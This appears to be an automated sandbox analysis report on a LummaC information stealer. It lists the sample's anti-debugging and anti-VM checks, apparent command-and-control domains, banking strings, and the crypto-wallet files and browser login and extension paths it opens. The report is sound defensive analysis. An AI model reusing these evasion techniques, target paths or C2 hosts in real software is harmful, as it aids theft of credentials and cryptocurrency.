              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD046F second address: 4CD0505 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0C50349h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F0D228CE261h 0x0000000f jmp 00007F0CB0C5033Eh 0x00000014 cmp dword ptr [769B459Ch], 05h 0x0000001b pushad 0x0000001c call 00007F0CB0C5033Eh 0x00000021 pop ecx 0x00000022 jmp 00007F0CB0C50347h 0x00000027 popad 0x00000028 je 00007F0D228E62FEh 0x0000002e jmp 00007F0CB0C50346h 0x00000033 xchg eax, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F0CB0C50347h 0x0000003b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0505 second address: 4CD0562 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F0CB0E1B265h 0x0000000b jmp 00007F0CB0E1B25Bh 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 pushad 0x00000016 mov ebx, 43FCE91Ah 0x0000001b push eax 0x0000001c push edx 0x0000001d pushfd 0x0000001e jmp 00007F0CB0E1B261h 0x00000023 sub esi, 0747EB96h 0x00000029 jmp 00007F0CB0E1B261h 0x0000002e popfd 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0588 second address: 4CD058C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD058C second address: 4CD0592 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0592 second address: 4CD05A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0CB0C5033Dh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD05A3 second address: 4CD05B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD05B2 second address: 4CD05B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD05B6 second address: 4CD05BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD05BA second address: 4CD05C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0600 second address: 4CD064C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B269h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edi, ax 0x00000010 pushfd 0x00000011 jmp 00007F0CB0E1B264h 0x00000016 sub esi, 12B72798h 0x0000001c jmp 00007F0CB0E1B25Bh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD064C second address: 4CD0652 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD0652 second address: 4CD0656 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 12EB3E instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 2CB038 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 2C9733 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 515Jump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 2742Jump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 2789Jump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 6104Thread sleep count: 58 > 30Jump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 6104Thread sleep time: -116058s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 3404Thread sleep count: 59 > 30Jump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 3404Thread sleep time: -118059s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 5424Thread sleep time: -36000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 1880Thread sleep time: -180000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 2188Thread sleep count: 55 > 30Jump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 2188Thread sleep time: -110055s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 3060Thread sleep count: 515 > 30Jump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 3060Thread sleep time: -1030515s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 6460Thread sleep count: 2742 > 30Jump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 6460Thread sleep time: -5486742s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 5140Thread sleep count: 2789 > 30Jump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 5140Thread sleep time: -5580789s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 5140Thread sleep time: -42021s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 3260Thread sleep count: 54 > 30Jump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 3260Thread sleep time: -108054s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\CommsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\PackagesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\3D ObjectsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\PeerDistRepubJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\GoogleJump to behavior
              Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
              Source: file.exe, 00000000.00000002.3075665011.00000000002AA000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
              Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
              Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
              Source: file.exe, 00000000.00000003.2164888631.0000000000DB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EoDQWKmkkz5r2t/JdGEOgobVO3e2CRsZ2/4jgnCoPykv2LHc4MmXH56rhpxIBXa3inAPay/w7rH7ctMmna0KcT7t4XzURacvZoNa4UQVSqqSkXdqd/GWsBZzoh6h7AdIU5C8bK3A0j8Xg7vVISgn07ONf2ov8JPtMybbVvGdFgUqxMw42Z2udgpe3pFUcVuq4rEPa7PIj9B2W5uS+eE+BRbViRXUrdZD5ouyUUAFWqrTjA9rV/Du+E46i1uwyEdgf4ycZKHV7k8Pu4fUGWB/msOMV2pSuc+FY3qXIqmlXiQOISn9zMWP73b/8sFINQZic8mvV94pRrBOOqYf0UwGbT6BzXzQsaNaakbn1RkoJ5oGxX5TYvWD6VsOq1uE7Z8VggEYONmdinYL8ufVaGxH+8vEWz4DrM75CgL+HuioZ2Ar2Zg4gZyPeyLzxtkgJFpickkKZw6pH2m/wmOaiYUaGUvQkAioZWvnZuvqlVRxWt+LtDZWT5FqsFY6ZiexyAdIElWZcdixl3syl+rlPR2CpobNbvuWOI6IdyOaf/yQBjlX2LB4qfDGOjf6lqhATEbDi+x/Uk64jtB2JpdW+bEKcR/FKcFwRVvjduOGyTkof5q3jFaOTrWT8Scm21uBwToQEiToOYGc8nfm85btVC1Kwqa5Bi56YVd54ybDRq3oBxASwNBYqaSTZy+6v5QxRBPX18x+FnaUj+h2W9InseAHSBPF3XGohZ8vZ6cmLejxjpq+5DdSTsyO0ZI6016FuSoRDpzhPdStgneXgt60eUhGFsLFDkdK/dedQwreKiFxzikmsNAA4ISSFiOC3sU9KCfbw+BjJhOwx8xPX5tHsMhPEBKQ0FjhgZ8/IqPSjXU1vmIaVf7HfuG6sE46ph/RTAbtDpmBJaAlvzMzi7bpQSm7o4rsNwpOfcf5TxafEumFMhlX7UHhKDGjZ1+659VhKCfTs40mLk+Qzvgab9ZD8OF7EXfZiDiB1Kp3I7q/1GQlDtKSgW5mUgl3Ia/yW0L1gAcQEuTQWQWdUysukxr5IDR28ra0NpZ38e6wFjoXVvmRKi0egf0N0Nin57JzHok8AEejipQ3CgfIj6EyO/pf+MRTZE+YmUTY+JMua9qX7HhgR/uLkX4reuXPvUsqtyat7C5Ae4j8JRhlA6+js1rhRBVKqpKRd2PW7bftHyeaJ7GUB0n32UHhKCU/s7OLBj2hKbujiuw3Ck59x/lPFp8S6YUyGVftQeEplRdDVofS5WA1B5ISkQ43JuyOiHcjmn/4kAY5V9iweKnwxjo3+paoQExGw4vsf1JOuI7QdiajK
              Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
              Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
              Source: file.exe, 00000000.00000003.3067177883.0000000000D5B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3078293319.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3078400834.0000000000D43000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3074720588.0000000000D43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
              Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
              Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
              Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
              Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
              Source: file.exe, 00000000.00000003.2544516259.000000000563A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
              Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
              Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
              Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
              Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
              Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
              Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
              Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
              Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
              Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
              Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
              Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
              Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
              Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
              Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
              Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
              Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
              Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
              Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
              Source: file.exe, 00000000.00000002.3078400834.0000000000D43000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3074720588.0000000000D43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
              Source: file.exe, 00000000.00000002.3075665011.00000000002AA000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
              Source: file.exe, 00000000.00000003.2544516259.0000000005635000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              LummaC encrypted strings found
              Source: file.exe, 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: scriptyprefej.store
              Source: file.exe, 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: navygenerayk.store
              Source: file.exe, 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: founpiuer.store
              Source: file.exe, 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: necklacedmny.store
              Source: file.exe, 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: thumbystriw.store
              Source: file.exe, 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: fadehairucw.store
              Source: file.exe, 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: crisiwarny.store
              Source: file.exe, 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: presticitpo.store
              Source: file.exe, 00000000.00000002.3075965650.00000000002EC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: file.exe, 00000000.00000003.3066838400.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3067227914.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2738702991.0000000000DAB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: les%\Windows Defender\MsMpeng.exe
              Source: file.exe, 00000000.00000003.3067157076.0000000000D7F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3067203130.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2728000075.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3078400834.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3074720588.0000000000D2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 2736, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: file.exe, 00000000.00000003.3067177883.0000000000D5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
              Source: file.exe, 00000000.00000003.3067177883.0000000000D5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
              Source: file.exe, 00000000.00000003.3067177883.0000000000D5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: file.exe, 00000000.00000003.2573744183.0000000000DAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
              Source: file.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: file.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: file.exe, 00000000.00000003.3067177883.0000000000D5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
              Source: file.exe, 00000000.00000003.2543832248.0000000000DAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: file.exe, 00000000.00000003.2543832248.0000000000DAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
